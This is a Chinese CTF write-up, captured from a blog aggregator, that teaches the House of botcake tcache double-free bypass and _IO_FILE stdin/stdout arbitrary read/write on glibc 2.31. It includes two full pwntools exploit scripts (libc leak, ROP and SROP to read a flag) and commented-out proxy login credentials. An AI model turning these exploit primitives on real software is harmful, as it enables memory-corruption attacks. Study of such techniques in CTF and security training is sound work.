惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

宝玉的分享
宝玉的分享
T
Threat Research - Cisco Blogs
H
Hacker News: Front Page
N
News and Events Feed by Topic
Know Your Adversary
Know Your Adversary
Cisco Talos Blog
Cisco Talos Blog
SecWiki News
SecWiki News
C
Cisco Blogs
D
Darknet – Hacking Tools, Hacker News & Cyber Security
T
Tor Project blog
K
Kaspersky official blog
Forbes - Security
Forbes - Security
Webroot Blog
Webroot Blog
Schneier on Security
Schneier on Security
P
Privacy & Cybersecurity Law Blog
H
Heimdal Security Blog
Y
Y Combinator Blog
The GitHub Blog
The GitHub Blog
S
SegmentFault 最新的问题
V
Vulnerabilities – Threatpost
T
Tenable Blog
T
Tailwind CSS Blog
P
Privacy International News Feed
WordPress大学
WordPress大学
大猫的无限游戏
大猫的无限游戏
小众软件
小众软件
博客园 - Franky
Hacker News: Ask HN
Hacker News: Ask HN
Jina AI
Jina AI
C
Cybersecurity and Infrastructure Security Agency CISA
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
雷峰网
雷峰网
Vercel News
Vercel News
A
About on SuperTechFans
爱范儿
爱范儿
Simon Willison's Weblog
Simon Willison's Weblog
AWS News Blog
AWS News Blog
The Last Watchdog
The Last Watchdog
Engineering at Meta
Engineering at Meta
Spread Privacy
Spread Privacy
Security Archives - TechRepublic
Security Archives - TechRepublic
博客园 - 司徒正美
量子位
博客园 - 三生石上(FineUI控件)
J
Java Code Geeks
Hacker News - Newest:
Hacker News - Newest: "LLM"
Recorded Future
Recorded Future
H
Hackread – Cybersecurity News, Data Breaches, AI and More
Martin Fowler
Martin Fowler
Project Zero
Project Zero

博客园_首页

Linux实操--组管理、权限管理和定时任务 Java + EasyExcel 实现单个接口导出多个Excel Mem0 源码解析系列(二):提示词工程的深度剖析 Openclaw TaskFlow究竟是什么?和普通Skill技能有什么区别 博文阅读密码验证 - 博客园 嘉立创开源:应该是全网MicroPython教程最多的开发板 Hermes Agent 集成实践:从协议到生产 2026年AI编程工具横评:Cursor、Codex、Claude Code、Zed、Windsurf Java程序员必看的RAG入门教程 2026 AI效率神器:Superpowers + Claude Code 保姆级教程 本地大模型部署全攻略:从 0 到 1 玩转 Ollama 【从0到1构建一个ClaudeAgent】内存管理-上下文压缩 .NET 高级开发 | 设计、实现一个事件总线框架 电子小白入门之NE555 3. WorkBuddy:隐藏玩法,一键召唤专家,让 AI 以"专家身份"给你干活 和AI一起搞事情#3:Claude Teammate 游戏开发翻车实录 【OpenClaw】通过 Nanobot 源码学习架构---(7)Memory C# .NET 周刊|2026年3月3期 我在 Debian 11 上把 K8s 单机搭起来了,过程没你想的那么顺(/opt 目录版) 深度学习进阶(七)Data-efficient Image Transformer CLI+Skill搭建浏览器AI自动化框架,告别一切重复枯燥任务 告别Token账单无底洞:OpenClaw本地部署,重塑企业数据主权的唯一解 FastAPI+Vue:文件分片上传+秒传+断点续传,这坑我帮你踩平了! SBTI 爆火后,我做了个程序员版的 CBTI。。已开源 + 附开发过程 多模态检索开始进入工程期:用 Sentence Transformers 搭建可落地的 Multimodal RAG 100多行代码实现一个最简单的Agent(用ReAct) Claude Code 通关手册(八):推荐 5 个 Hooks,代码质量提升 3 倍 老板:“有人截图了!”。安全部门:“收到,马上查暗水印!” - why技术 技术之外,皆是人间 C#/.NET/.NET Core技术前沿周刊 | 第 69 期(2026年4.01-4.12) Snack JSONPath 项目架构分析 Claude Code Buddy 小析:一个非核心功能,如何体现产品的细节完成度 AI新时代下的图床管理方案-Cloudflare图床+MCP+Skills方案指南 化繁为简:顺丰速运App如何通过 HarmonyOS SDK实现专业级空间测量 从零实现富文本编辑器#13-React非编辑节点的内容渲染 AI开发-python-langchain框架(3-23-OpenAI Functions风格Tool Calling智能助手) .NET + AI 进阶实战:基于类的技能开发 - 打造可治理的 Agent 能力模块 【从0到1构建一个ClaudeAgent】规划与协调-技能 上周热点回顾(4.6-4.12) 电子小白的工具三件套:面包板、杜邦线、万能板 单表五亿数据的查询优化 | Mysql、StarRocks 2. WorkBuddy:从“我是谁”到“帮我干活” C# 如何减少代码运行时间:7 个实战技巧 基于HelixToolkit.SharpDX 渲染3D模型 - 笺上知微 从零开始的双臂具身VLA起源及现阶段发展综述 - SkyXZ 记对 xonsh shell 的使用, 脚本编写, 迁移及调优 - pluvium27 受够了Vibe Coding的失控?换个起点,让AI事半功倍 从开始配置漏洞环境到漏洞复现流程 - 難しい 关于10年工作经验的程序员对OpenClaw的实战经验分享以及看法 - 虚无境 Any metadata 的内存布局 C# .NET 周刊|2026年3月2期 - InCerry 我帮你测过了,测试圈排名第二的 Skill 依然很牛逼 Skill Discovery | 无监督技能发现的经典工作总结 - MoonOut PbootCMS 网站内容数量多导致访问慢?这些实用优化方案帮你提速! - 家兴网络技术工作室 上下文工程是什么?过时了么?一文讲明白! - 一枫说码 网站漏洞怎么发现并修复?一篇实用指南(附完整流程) - 家兴网络技术工作室 开了 TUN 模式还是直连?90% 的人都踩过这个坑 Github日报|2026年04月12日 - AI一族 AScript扩展多种脚本语言 - rockey627 AI 学习笔记:Agent 的记忆机制 你能被装进一个文件里吗?——7 万人把同事"蒸馏"成了 AI - 我没有三颗心脏 Claude Code 通关手册(七):给 AI 装上技能包——Skills 完全指南 - 暮色之狐 在浏览器中快速编辑代码:VSCode Web 集成实践 - Newbe36524 蒸馏自己 skill?基于 Deepseek 的蒸馏器,丐版蒸馏方式,简单便捷 - To_Carpe_Diem Spring AI Aliababa和AgentScope,哪个更好? - 苏三说技术 Etsy 把 1000 个 MySQL 分片迁进 Vitess:425TB 数据背后的真正问题不是性能,而是运维规模 MicroPython LVGL基础知识和概念:底层渲染与性能优化 - FreakStudio 数据库草图算法 Python 潮流周刊#146:CPython 引入 Rust 的进展 - 豌豆花下猫 最小生成树 - mofei1116 红日靶场七:从外网入口、容器逃逸到 AD 接管的完整利用链复盘 - YouDiscovered1t 分享四款开源且实用的 Kafka 管理工具 - 追逐时光者 vLLM 权重加载机制全解析:从挑战到理想架构 LCT 学习笔记 - ACehomoxue Avalonia UI 12.0.0 正式发布:架构演进和性能飞跃 - 张善友 当 AI Agent 把调用链拉长,延迟开始成为一门生意 conhost.exe 无法显示 U+2717 - 145a 太秀了,我把自己蒸馏成了 Skill!已开源 - 程序员鱼皮 ASP.NET Core 内存缓存实战:一篇搞懂该怎么配、怎么避坑 基于 Ghostty 带有分割标签页和为 Claude 编程设计的通知终端 - BugShare AI 焊死入口:教育的“操作系统级”重塑 - 郝hai 初级Java开发工程师使用sql脚本编写代码的过程是简单而且不糊涂 - CoderOilStation Claude Code通关手册(六):MCP协议完全指南 - 暮色之狐 边框灯光环绕动画特效实现指南 - Newbe36524 开源:子木蒸馏版的 SEO 审计工具 seo-audit-skill v1.0 我所理解的Python元模型 【从0到1构建一个ClaudeAgent】规划与协调-TodoWrite - 程序员Seven Claude 和 Codex 在审计 Skill 上性能差异探究 - ACai_sec AScript如何实现中文脚本引擎 - rockey627 【渗透测试】HTB Season10 Garfield 全过程wp - dynasty_chenzi Android 开发者为什么必须掌握 AI 能力?端侧视角下的技术变革 树状数组正确性证明 - AC-wyr 你的 AI 焦虑,可能比 AI 本身更危险——ATM 机没有消灭银行柜员,但恐慌消灭了你的判断力 - 我没有三颗心脏 一个拉胯的分库分表方案有多绝望?整个部门都在救火! - 冰河团队 动态规划入门必学之走方格问题 - Ofnoname PostgREST 与 PostgreSQL 角色权限配置全解析(生产级实践) - SheepDog1998 使用 UEFI 图形输出协议 GOP 在屏幕上显示图像的方法 - 阿源- Claude Code通关手册(五):组建你的AI专家团队,子代理系统 - 暮色之狐 一个程序员到架构师的催婚路之感悟(整整10年后的催婚相亲感悟) - MisterLip 用 Agent Skill 自动生成工作周报 - 赵康
House of botcake与IOFILE任意读写
firefly_star · 2026-05-20 · via 博客园_首页

House of botcake

利用条件与效果及使用范围

应该是在libc2.31这个手法要的条件就是两个:UAF与申请足够数量的堆块。而效果就是:容易地址写,配合对IOFILE结构体的利用可以实现任意读,结合起来就可以进行任意读写。主要思路就是绕过tcache的double free检测即tcache key字段来完成攻击。虽然自有tcache机制以来到现在都可以使用,不过因为之前tcache检测很弱直接double free也没有影响,所以主要还是glibc2.29-至今用的比较多。

攻击思路及流程

主要流程就是先申请7个同一大小的堆块,再申请两个相同大小的堆块,前申请的我们不妨叫堆块a,后申请的叫堆块b,再申请一个堆块防止合并。
释放申请的9个堆块,其中7个堆块会填满tcache对应大小的链表,此时因为tcache已满,我们再释放相同大小的堆块就会进入unsortedbin。

同时,因为unsortedbin的堆块如果物理相邻就会合并,我们需要让堆块a和b合并。合并后我们再申请一个相同大小的堆块,由于系统会首先遍历tcache链表,如果能找到就会在tcache里取堆块。所以会从tcache里取一个堆块出来,此时我们利用UAF漏洞再free一次堆块b,这样堆块b就又在tcache又在unsortedbin了。

为什么能free?实际上free一个指针应该只会检测这个指针+*(这个存放这个指针的地址-8)的地址的p标志位是不是1
以及这个指针+*(这个存放这个指针的地址-8)的地址的下一个地址的p标志位是不是1。
文字描述太抽象了,比如有UAF,我们直接在链表里找出来那个地址。
这个地址一般就是我们写入数据的地址,我们用这个地址减0x10,再用heap 这个地址 
这个命令看一下堆块的完整性即可。

6W47R@@_NL}$S04~PW(F71

此时如果我们申请比堆块a大小大一点的堆块,由于在tcache里找不到,系统就会在unsortedbin里切割,此时就会切割我们a,b合并后的堆块了。此时我们就完成了overlapping,可以改在tcache里的堆块b的fd指针实现任意地址写了。如果我们不这样申请,而是多申请几次,申请的堆块的总大小等于堆块a的大小,就可以在堆块b的fd指针里留下main_arena相关的地址,而这个地址又和libc相关。只要我们再继续切割unsortedbin就可以改堆块b的bk指针吗,只要爆破两位就可以构造出指向IOFILE结构体的指针,进而完成任意读写。

IOFILE任意读写

目前我感觉我还是不太有能力结合源码分析,各位如果想看结合源码分析可以看raycp师傅的文章IO FILE 之任意读写,写的非常好。本文大部分也借鉴了其中的内容,不过我是以比较宏观的视角来分析的,可能比较好理解一点。不过源码肯定要看,之后我也会结合源码讲讲。

先回顾一下IOFILE结构体

0x0   _flags
0x8   _IO_read_ptr
0x10  _IO_read_end
0x18  _IO_read_base
0x20  _IO_write_base
0x28  _IO_write_ptr
0x30  _IO_write_end
0x38  _IO_buf_base
0x40  _IO_buf_end
0x48  _IO_save_base
0x50  _IO_backup_base
0x58  _IO_save_end
0x60  _markers
0x68  _chain
0x70  _fileno
0x74  _flags2
0x78  _old_offset
0x80  _cur_column
0x82  _vtable_offset
0x83  _shortbuf
0x88  _lock
0x90  _offset
0x98  _codecvt
0xa0  _wide_data
0xa8  _freeres_list
0xb0  _freeres_buf
0xb8  __pad5
0xc0  _mode
0xc4  _unused2
0xd8  vtable

我们知道,除了进行系统调用的输入/输出read,write这些,其他的输入/输出都会用到IOFILE结构体,即三个输入/输出流中,即stdin(标准输入),stdout(标准输出),stderr(标准错误)。而我们输入/输出一般都是缓冲输入/输出。我们可以这些流中的结构体成员起到任意读写的效果。

比如stdin,我们就是利用了改变输入缓冲区的地址,来把我们本应该输入到输入缓冲区的数据,先输入到了我们要输入的目标地址,即控制stdin的_IO_buf_base与 _IO_buf_end。

Stdin利用流程

当然我们利用肯定是有条件的:

  1. 条件第一个就是输入缓冲区要没有数据即_IO_read_end —— _ IO_read_ptr >0
  2. 条件第二个就是flags字段表明这地方可写,即flag里没有不可写的位标志,其中c语言定义了#define _IO_NO_READS 4,也就是我们的flags字段&0x4要为0,即设置flags&~0x4
  3. 条件第三个我们输入的文件描述符,如果想用键盘输入就要把_fileno设为0
  4. 条件第四个就是 _IO_buf_base设置成我们写入的地址, _IO_buf_end设置成我们写入结束的地址。且输入缓冲区的大小即 _IO_buf_end- _IO_buf_base要大于我们输入的数据的大小。

这样我们就可以利用stdin进行任意写了。当然其实实际上一般我们很多条件本来就会满足,我们改的时候注意一下这些条件即可一般就改 _IO_buf_base与 _IO_buf_end就可以了。

Stdout利用流程

任意写

由于stdout即有把输出缓冲区的数据输出出来,又有把数据写入输出缓冲区,所以利用stdout可以进行任意读写。但是这个任意写需要我们能控制输出的数据,并不能直接从键盘上读取数据。实际利用的话把_IO_write_ptr(输出缓冲区的开始)改成我们想写的地址的开始,把 _IO_write_end(输出缓冲区的结束)改成我们想写地址的结束即可。

任意读

跟stdin类似,我们攻击的是输出缓冲区,利用输出时如果系统检测到输出缓冲区有数据就会刷新输出缓冲区的机制,把 _IO_write_base改成我们想泄露数据的开始,把 _IO_write_end改成我们想泄露数据的结束即可。

条件就是:

  1. flags标志不能有_IO_NO_WRITES标志,即flags&0x8必须为0。可以设置flags&~0x8
  2. flags标志最好有_IO_CURRENTLY_PUTTING标志,因为不然会多一些操作,让流程不可控,可以设置flag | 0x800
  3. 设置_fileno为1
  4. 设置_IO_read_end等于 _IO_write_base 或设置 _flag & _IO_IS_APPENDING即 _flag | 0x1000。
  5. 把 _IO_write_base改成我们想泄露数据的开始,把 _IO_write_end改成我们想泄露数据的结束即可。

下面我们看例题

2026ISCC线上挑战赛决赛——note

这个比赛如何暂且不骂了,这个远程靶机也先不骂了。单单看这个题还是出的可以的。题开了pie,开了沙箱,只允许ORW,glibc给的版本是2.31,我们当2.31打吧。远程好像不是这个版本(我***)

D0PQH@Z~9J{}@9HKT{UZ909

逻辑就是普通的堆菜单题有edit功能,但是没有show功能,不能输出数据。有UAF,索引可以申请0-0x15,但索引可以复用。所以我们可以打House of botcake,然后攻击stdout泄露出libc此时就有两种思路了。

第一种是:我们之前在打stdout的时候已经有了攻击stdout的伪造的堆块,所以我们可以用edit功能一直打stdout。这样我们就可以利用stdout读环境变量泄露栈地址打栈上rop。当然没有edit也影响不大,因为索引可以复用,再打一遍House of botcake也一样。

第二种是:因为版本是2.31,我们可以打__free_hook,把freehook改成magic gadget,然后利用setcontext调用实现栈迁移,把栈迁移到freehook来,并且利用setcontext调用read往freehook上写rop链实现ORW。

这两种都可以,这里要泄露堆地址个人感觉不是很方便,所以就没想过写shellcode的。用mprotect把freehook附近的地址改成可执行然后在上面填shellcode感觉应该也可以。

第一种的exp如下:

#!/usr/bin/env python3
from pwn import *
import sys
from ctypes import *
#from pwncli import *
import socks
# cli_script()
#from ae64 import AE64
#from pymao import *
context.log_level='debug'
context.arch='amd64'
elf=ELF('./pwn')
libc = ELF('./libc.so.6')
# libc1=cdll.LoadLibrary('./libc.so.6')
li='./libc.so.6'
'''
socks.set_default_proxy(
    socks.SOCKS5,
    "81.dart.ccsssc.com",
    25790,
    username="1nkvap1o",
    password="cl330rd",
    rdns=True
)
socket.socket = socks.socksocket
'''
flag = 0
if flag:
    p = remote('39.96.193.120',10011)
else:
    p = process('./pwn')
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
slr = lambda s : p.sendline(str(s))
sd = lambda s : p.send(s)
sdr = lambda s : p.send(str(s).encode())
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
rcl = lambda : p.recvline()
leak = lambda name,addr :log.success(name+"--->"+hex(addr))
u6 = lambda a : u64(rc(a).ljust(8,b'\x00').strip())
i6 = lambda a : int(a,16)
def csu():
    pay=p64(0)+p64(0)+p64(1)
    return pay
def ph(s):
    print(hex(s))
def dbg():
    # context.terminal = ['tmux', 'splitw', '-h']
    gdb.attach(p)#maybe gdbscript='set debug-file-directory ./star'
    pause()
def add(s,a,d):
    ru(b"Choice: ")
    sdr(1)
    ru(b"Index: ")
    sdr(s)
    ru(b"Size: ")
    sdr(a)
    ru(b"Content: ")
    sd(d)
def free(s):
    ru(b"Choice: ")
    sdr(2)
    ru(b"Index: ")
    sdr(s)
def edit(s,a):
    ru(b"Choice: ")
    sdr(3)
    ru(b"Index: ")
    sdr(s)
    ru(b"Content: \n")
    sd(a)
for i in range(10):
    add(i,0x230,b'b')#6tcache 7pre 8vic 9guide
for i in range(9):
    free(i)
add(1,0x230,b'b')
free(8)
add(2,0x150,b'\x00')
add(3,0xd0,b'b')
add(4,0xd0,p16(0x26a0))
add(5,0x230,p16(0x26a0))
add(9,0xd0,b'b')
pay=p64(0xfbad3887)+flat(0,0,0)+b'\x00'
dbg()
add(6,0x230,pay)
rcl()
rc(8)
libcbase=u6(6)-0x1ec980
st=libcbase+libc.sym['environ']
end=libcbase+0x630a9
rax=libcbase+0x36174
rdi=libcbase+0x23b6a
rsi=libcbase+0x2601f
rdx2=libcbase+0x15fae6  #pop rdx ; pop rbx ; ret
pay=p64(0xfbad3887)+flat(0,0,0,st,st+8)
ph(end)
ph(end)
edit(6,pay)
stack=u6(6)-0x120-8
ph(stack)
free(9)
free(4)
edit(5,p64(stack))
add(6,0xd0,b'b')
add(7,0xd0,b'./flag\x00\x00'+flat(rax,0,rdi,0,rsi,stack+0x58,rdx2,0x1000,0,end))
pay=flat(rdi,stack,rsi,0,rax,2,end)+flat(rdi,3,rsi,stack,rdx2,0x100,0,rax,0,end)+flat(rdi,1,rsi,stack,rdx2,0x100,0,rax,1,end)
sd(pay)
ti()

第二种的exp如下:

#!/usr/bin/env python3
from pwn import *
import sys
from ctypes import *
#from pwncli import *
import socks
# cli_script()
#from ae64 import AE64
#from pymao import *
context.log_level='debug'
context.arch='amd64'
elf=ELF('./pwn')
libc = ELF('./libc.so.6')
# libc1=cdll.LoadLibrary('./libc.so.6')
li='./libc.so.6'
'''
socks.set_default_proxy(
    socks.SOCKS5,
    "81.dart.ccsssc.com",
    25790,
    username="1nkvap1o",
    password="cl330rd",
    rdns=True
)
socket.socket = socks.socksocket
'''
flag = 0
if flag:
    p = remote('39.96.193.120',10011)
else:
    p = process('./pwn')
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
slr = lambda s : p.sendline(str(s))
sd = lambda s : p.send(s)
sdr = lambda s : p.send(str(s).encode())
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
rcl = lambda : p.recvline()
leak = lambda name,addr :log.success(name+"--->"+hex(addr))
u6 = lambda a : u64(rc(a).ljust(8,b'\x00').strip())
i6 = lambda a : int(a,16)
def csu():
    pay=p64(0)+p64(0)+p64(1)
    return pay
def ph(s):
    print(hex(s))
def dbg():
    # context.terminal = ['tmux', 'splitw', '-h']
    gdb.attach(p)#maybe gdbscript='set debug-file-directory ./star'
    pause()
def add(s,a,d):
    ru(b"Choice: ")
    sdr(1)
    ru(b"Index: ")
    sdr(s)
    ru(b"Size: ")
    sdr(a)
    ru(b"Content: ")
    sd(d)
def free(s):
    ru(b"Choice: ")
    sdr(2)
    ru(b"Index: ")
    sdr(s)
def edit(s,a):
    ru(b"Choice: ")
    sdr(3)
    ru(b"Index: ")
    sdr(s)
    ru(b"Content: \n")
    sd(a)
for i in range(10):
    add(i,0x230,b'b')#6tcache 7pre 8vic 9guide
for i in range(9):
    free(i)
add(1,0x230,b'b')
free(8)
add(2,0x150,b'\x00')
add(3,0xd0,b'b')
add(4,0xd0,p16(0x26a0))
add(5,0x230,p16(0x26a0))
add(9,0xd0,b'b')
pay=p64(0xfbad3887)+flat(0,0,0)+b'\x00'
#dbg()
add(6,0x230,pay)
rcl()
rc(8)
libcbase=u6(6)-0x1ec980
fh=libcbase+libc.sym['__free_hook']-8
test=libcbase+libc.sym['setcontext']+61
end=libcbase+0x630a9
rax=libcbase+0x36174
rdi=libcbase+0x23b6a
rsi=libcbase+0x2601f
rdx2=libcbase+0x15fae6  #pop rdx ; pop rbx ; ret
magic=libcbase+0x151bb0
ph(test)
ph(magic)
free(9)
free(4)
edit(5,p64(fh))
add(8,0xd0,b'b')
srop=SigreturnFrame()
srop.rsp=fh+0x38
srop.rdi=0
srop.rsi=fh+0x38
srop.rdx=0x1000
srop.rip=libcbase+libc.sym['read']
add(7,0xd0,b'./flag\x00\x00'+p64(magic)+flat(fh,0,0,test)+bytes(srop)[0x28:])
pay=flat(fh,fh+8)
edit(8,pay)
free(8)
pay=flat(rdi,fh,rsi,0,rax,2,end)+flat(rdi,3,rsi,fh,rdx2,0x100,0,rax,0,end)+flat(rdi,1,rsi,fh,rdx2,0x100,0,rax,1,end)
sd(pay)
ti()

因为打stdout要爆破一个16进制位,所以这个脚本要跑挺久...

总结

总的来说这个手法还是挺有用的,这里要感谢一位师傅的指导了,不然我确实想不出来orzorz。也是第一次实践IOFILE了。